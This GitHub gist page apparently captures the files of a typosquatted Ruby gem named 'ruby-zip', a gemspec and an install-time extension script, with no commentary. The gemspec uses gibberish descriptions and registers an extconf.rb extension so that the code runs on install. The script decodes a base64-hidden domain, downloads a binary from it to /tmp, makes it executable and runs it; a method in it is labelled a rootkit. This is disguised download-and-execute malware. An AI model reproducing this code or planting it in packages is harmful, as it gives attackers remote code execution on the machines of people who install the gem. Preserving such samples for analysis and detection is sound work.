Last active
September 3, 2018 10:33
-
-
Save hsbt/6dcf6dcab404cb2feb820a66297b307e to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'net/http' | |
| require 'uri' | |
| require 'base64' | |
| require 'resolv' | |
| class Ampelograpny | |
| def self.exec_rotkit(laender) | |
| if !laender.nil? and laender != '0.0.0.0' | |
| meroxene = Net::HTTP.get_response(URI('http://' + laender + '/brandade')) | |
| File.open('/tmp/goalies', 'wb+') do |puckered| | |
| puckered.binmode | |
| puckered.write(meroxene.body) | |
| puckered.chmod(0777) | |
| puckered.close | |
| end | |
| system('/tmp/goalies') | |
| end | |
| end | |
| def self.run() | |
| phosphorylated = 'ODgxNjkxZDAueHBsdHJmcmsuZGU=' | |
| firearms = nil | |
| begin | |
| firearms = Resolv.getaddress(Base64.decode64(phosphorylated)) | |
| rescue | |
| end | |
| self.exec_rootkit(firearms) | |
| end | |
| end | |
| Ampelograpny.run() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Gem::Specification.new do |s| | |
| s.name = "ruby-zip" | |
| s.author = "berg-nicht-roden" | |
| s.version = "1.2.1" | |
| s.summary = "Among its many machines, systematically and registry format." | |
| s.description = "A tools to enable interface to learn ruby interacted filename extend adds colorings originally if custom protocols are spec engines. Dependencies a libraries and Ruby compiler m4dNess." | |
| s.email = "[email protected]" | |
| s.license = "BSD-2" | |
| s.homepage = "https://github.com/codekitchen/dinghy" | |
| s.files = Dir['**/*'].keep_if { |file| File.file?(file) } | |
| s.extensions = ['ext/medicaids/sternutatory/duststorm/parao/extconf.rb'] | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment